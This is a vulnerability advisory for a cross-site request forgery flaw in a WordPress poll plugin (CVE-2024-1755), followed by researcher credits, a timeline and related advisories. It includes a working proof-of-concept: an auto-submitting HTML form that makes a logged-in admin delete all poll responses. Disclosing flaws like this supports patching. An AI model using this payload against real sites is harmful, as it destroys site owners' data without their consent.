NPS computy < 2.7.6 – Results Deletion via CSRF | CVE 2024-1755 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

Make a logged in admin open the following:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=nps-plugin-options" method="POST">
        <input type="text" id="event" name="event" value='delete_all'>
        <input type="submit" value="submit" name="add">
    </form>
</body>
```

The result is that all existing poll responses are deleted.

Affects Plugins

Fixed in 2.7.6

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

481a376b-55be-4afa-94f5-c3cf8a88b8d1

Timeline

Publicly Published

2024-03-25 (about 1 months ago)

Added

2024-03-25 (about 1 months ago)

Last Updated

2024-04-01 (about 28 days ago)

Other

Published

Title

Published

2023-11-12

Title

ShiftController Employee Shift Scheduling < 4.9.24 - CSRF

Published

2023-05-24

Title

WP Tiles <= 1.1.2 - Cross-Site Request Forgery

Published

2023-11-14

Title

Events Addon for Elementor < 2.1.3 - Cross-Site Request Forgery

Published

2023-04-05

Title

YourChannel < 1.2.5 - Multiple CSRF

Published

2022-05-30

Title

Multi-page Toolkit <= 2.6 - Arbitrary Settings Update to Stored XSS via CSRF